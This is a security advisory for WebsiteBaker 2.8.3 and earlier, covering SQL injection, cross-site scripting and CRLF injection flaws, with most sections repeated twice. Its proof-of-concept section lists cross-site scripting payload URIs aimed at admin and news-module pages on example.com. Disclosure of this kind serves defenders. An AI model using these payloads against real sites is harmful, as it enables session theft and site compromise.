WebsiteBaker Multiple Security Vulnerabilities
BID:71276
Info
WebsiteBaker Multiple Security Vulnerabilities
| Bugtraq ID: | 71276 |
| Class: | Input Validation Error |
| CVE: |
CVE-2014-9242 CVE-2014-9243 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 17 2014 12:00AM |
| Updated: | Dec 05 2014 12:58AM |
| Credit: | Manuel Garcia Cardenas |
| Vulnerable: |
WebsiteBaker WebsiteBaker 2.8.3 WebsiteBaker WebsiteBaker 2.8.2 SP2 |
| Not Vulnerable: | |
Discussion
WebsiteBaker Multiple Security Vulnerabilities
WebsiteBaker is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities
3. A CRLF-injection vulnerability
Exploiting these vulnerabilities could allow an attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and to add arbitrary headers to a website.
WebsiteBaker 2.8.3 and prior are vulnerable.
WebsiteBaker is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities
3. A CRLF-injection vulnerability
Exploiting these vulnerabilities could allow an attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and to add arbitrary headers to a website.
WebsiteBaker 2.8.3 and prior are vulnerable.
Exploit / POC
WebsiteBaker Multiple Security Vulnerabilities
Attackers can use a browser to exploit these issues. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.
The following example URI's and data are available:
http://www.example.com/wb/admin/pages/modify.php?page_id=1
http://www.example.com/wb/admin/admintools/tool.php?tool=captcha_control&6d442"><script>alert(1)</script>8e3b12642a8=1
http://www.example.com/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1&section_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0
http://www.example.com/wb/modules/news/add_post.php?page_id=1&section_id=f953a"><script>alert(1)</script>4ddf3369c1f
http://www.example.com/wb/modules/news/modify_group.php?page_id=1&section_id=%008cf03"><script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3
http://www.example.com/wb/modules/news/modify_post.php?page_id=1&section_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52
http://www.example.com/wb/modules/news/modify_settings.php?page_id=1&section_id=%008b2f4"><script>alert(1)</script>bdc8b3919b5
Attackers can use a browser to exploit these issues. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.
The following example URI's and data are available:
http://www.example.com/wb/admin/pages/modify.php?page_id=1
http://www.example.com/wb/admin/admintools/tool.php?tool=captcha_control&6d442"><script>alert(1)</script>8e3b12642a8=1
http://www.example.com/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1&section_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0
http://www.example.com/wb/modules/news/add_post.php?page_id=1&section_id=f953a"><script>alert(1)</script>4ddf3369c1f
http://www.example.com/wb/modules/news/modify_group.php?page_id=1&section_id=%008cf03"><script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3
http://www.example.com/wb/modules/news/modify_post.php?page_id=1&section_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52
http://www.example.com/wb/modules/news/modify_settings.php?page_id=1&section_id=%008b2f4"><script>alert(1)</script>bdc8b3919b5
Solution / Fix
WebsiteBaker Multiple Security Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
WebsiteBaker Multiple Security Vulnerabilities
References:
References: